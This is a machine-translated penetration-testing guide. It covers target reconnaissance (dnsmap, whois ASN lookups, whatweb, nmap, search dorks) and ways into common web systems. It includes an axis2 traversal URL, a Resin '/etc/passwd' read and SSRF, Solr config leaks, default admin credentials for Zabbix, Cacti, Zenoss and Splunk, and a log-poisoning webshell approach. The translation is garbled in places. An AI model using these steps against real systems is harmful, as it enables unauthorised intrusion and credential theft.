Looking for breakthroughs in penetration
0x00 target search
In daily detection and observation of others, it is found that information collection in the early stage plays a critical role. In many cases, you do not need to study a vulnerability, if you collect enough targets in the early stage, you only need to detect some common high-risk vulnerabilities.
Common ideas
1. network segment information
1) subdomain name
If the domain transfer vulnerability exists, it is the best. Otherwise, the subdomain name will be cracked.
My commonly used software is dnsmap, basic usage
./Dnsmap target-domain.com-w your domain name dictionary-r the absolute path to save the result File
For a domain name with extensive resolution, you can use-I to ignore ip addresses to avoid false positives. If no domain name is resolved to 1.1.1.1 during the domain name xxx.com brute-force cracking process, run the following command:
./dnsmap xxx.com -w domain.txt -i 1.1.1.1 -r /tmp/result.txt
The result is in the following format:
The default dnsmap compilation has a problem. For the solution and other usage methods, see
Http://pan.baidu.com/s/1nt5HMw5
You can add some such names as oa, zabbix, nagios, cacti, erp, sap, and crm Based on the default dictionary. Many enterprises use this naming method.
Penetration will usually look for targets from important business network segments such as oa and mail. If some domain names in the management background are
Xx.admin.xxx.com can be expanded to search for third-level domain names under admin.xxx.com.
I did not intend to find a ntp.nb.xxx.com domain name when I checked a website, and then broke the domain name nb.xxx.com. The result is as follows:
Zabbix.nb.xxx.com is exposed to the Internet and has a low version. You can use the zabbix injection vulnerability to obtain permissions.
At the same time, sub-domain names can also be collected through the search engine syntax site: xxx.com (increasing conditions to get more, such as inurl and intitle)
2) AS number
Jwhois usage
yum install -y jwhois
Run
whois -h asn.shadowserver.org origin 1.1.1.1
Obtain the AS number of the enterprise where the ip is located
Continue execution
Whois-h asn.shadowserver.org prefix as No.
You can obtain the corresponding network segment of the as number.
Note: Generally, only large enterprises have an as number, and an enterprise may have multiple as numbers.
3) DNS
4) spf records
How to determine cdn?
If you mistakenly Add the cdn ip address to the target, some manual time will be affected. How can you determine cdn? The simplest method is to use the ping function in multiple locations.
Http://ping.chinaz.com/
2. Use whatweb to find web portals
Usage
./Whatweb 1.1.1.1/24 -- log-brief = output_file (For details, refer to the usage instructions)
By default, only port 80 is identified. If you want to identify port 8080, add -- url-suffix = ": 8080 ".
You can search for the target based on the title, cms, and other information. Generally, you can search for websites with Parsing Vulnerabilities in earlier nginx versions, the affected versions are 0.5 full versions, 0.6 full versions, 0.7 <= 0.7.65, 0.8 <= 0.8.37
Attached to an instance:
When detecting an enterprise, whatweb batch identification fingerprint finds a website with a low nginx version and a resolution vulnerability. The homepage is a blank page, and the directory structure is cracked. bash_history File
A package file is found in the operation history and stored in the web directory.
Download the package file. The content is as follows:
A log file is found, and the log file records the user-agent information.
Use firefox plug-in User Agent Switcher To Change user-agent Information
Attackers can exploit the parsing vulnerability to directly obtain webshells after writing a single-statement code to a log file.
3. Use nmap to find available services
For detailed usage instructions, refer to the user manual. The commonly used commands are as follows (-P0 parameter is added as needed. If ping is not disabled, it can be skipped to increase the speed)
./nmap -sT -sV 1.1.1.1/24 -P0 -oN /tmp/port_result.txt --open
When there are few Ip addresses, you can scan the entire port and some basic information.
./nmap -sT -sV -p 1-65535 1.1.1.1 -P0 -A
Using nmap, we can find some web ports on common ports such as 80/443/8080 and some ports that are prone to problems, such
873 (rsync not verified)/21 (ftp Anonymous Account)/11211 (memcache not verified)/27017 (mongodb not verified) and so on. Don't give up when you encounter unfamiliar services, go to exploit-db and other sites to search for known vulnerabilities. Maybe you cannot find an RCE directly. (in many cases, I will also search for it in wooyun, which is an actual example, more straightforward)
4. Search Engines for background or important systems
Common search Syntax: site: xxx.com inurl: login
The value of Inurl can be freely changed. Commonly Used keywords include admin, manage, or intitle: Search for keywords such as management and logon. Most of the results of some sites may be false positives under the same site, for example, for a blog or question type, you can use-to reduce false positives. For example, you can search for site: baidu.com inurl: login-zhidao in google to remove zhidao-related results from the results, input from Baidu
site:baidu.com inurl:login -site:zhidao.baidu.com
Example reference: WooYun: a complete web detection process for Suning Tesco (multiple images)
5. Create a simplified path dictionary
We can make common paths that are prone to problems and are highly risky into a simple small dictionary and traverse the previously collected domain names, such as/invoker/jmxinvokerservlet1_wwwroot.zip, if you find it, you are likely to get the permission.
0x01 Exploitation
Several common system exploitation methods are listed here.
1. Background
When the background or important system is found in the current process, the following checks are generally performed:
1) awvs comprehensive scan (frequent unexpected discoveries) 2) directory structure brute-force attack 3) password brute-force attack (when admin fails, the password may not be incorrect. In many cases, the user name is incorrect, all methods that you can think of to get the user name, such as turning over js, css files, html source code comments, or. svn directory information leakage, etc. The password can be modified to the system name, domain name, and other information to be added to the dictionary.) 4) html source code, js, and other files to obtain information (some developers will put some management addresses in html source code as annotations, and the management interface addresses will be written in js. If you are lucky, you can directly access them without authorization) 5) The parameter value is cracked (some background login pages written by the framework may be in this format xx.com /? C = login. You can collect common parameter values, such as index, main, upload, edit, and adduser. If you are lucky, you can directly perform unauthorized operations)
2. axis2
File Inclusion:
Www.xxx.com/axis2/services/listServices view all services
Www.xxx.com/axis2/services/xxxxx? Xsd = ../conf/axis2.xml xxxxx can replace any service, read the axis2 configuration file to get the background account
Www.xxx.com/axis2/axis2-admin/ log on to the Management Background
Code execution of the background deployment file:
Use metasploit
Resin
File Reading:
Http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test? InputFile =/etc/passwd
You can also use
Http://www.xxx.com/resin-doc/resource/tutorial/jndi-appconfig/test? InputFile = http: // 1.1.1.1
SSRF implementation
Solr Sensitive Information Leakage
Http://xxx.org: 8080/solr/admin/file /? File = solrconfig. xml
Search for xml files and find the data-import.xml
Access http://xxx.org: 8080/solr/admin/file /? File = data-import.xml get Database Password
Hudson (similar to jenkins)
Refer to an application of Sohu for remote Groovy code execution! Http://www.bkjia.com/Article/201303/197476.html
Zenoss
Google Keyword: intitle: "Zenoss Login"
Default password admin/zenoss
Usage reference
From a default password to youku and tudou Intranet (hazards please fix as soon as possible) http://www.bkjia.com/Article/201304/206243.html
Zabbix
Background: http://www.xxx.com/zabbix
Default password: admin/zabbix
Google: inurl: zabbix/dashboard. php
For usage methods, see WooYun: the improper operation and maintenance of application zabbix leads to arbitrary command execution.
In addition, this zabbix injection also has many http://drops.wooyun.org/papers/680
Cacti
Default logon path: www.xxx.com/cacti/index.php
Default password admin/admin
For details about the exploitation method, refer to the WooYun: cacti background logon command execution vulnerability.
Splunk
Default background address:
Http://xxx.com: 8000/zh-CN/account/login? Return_to = % 2Fzh-CN % 2F
Default Account admin/changeme default port 8000
Manager-Application-obtain the shell from the File Installation Application
Msf exploitation Module
Exploit/multi/http/splunk_upload_app_exec
0x02 ends
Two comprehensive introduction articles about wooyun are recommended.
1. View O & M security from wooyun
Http://drops.wooyun.org/papers/410
2. Attack Java Web applications 7-Server 1
Http://drops.wooyun.org/tips/604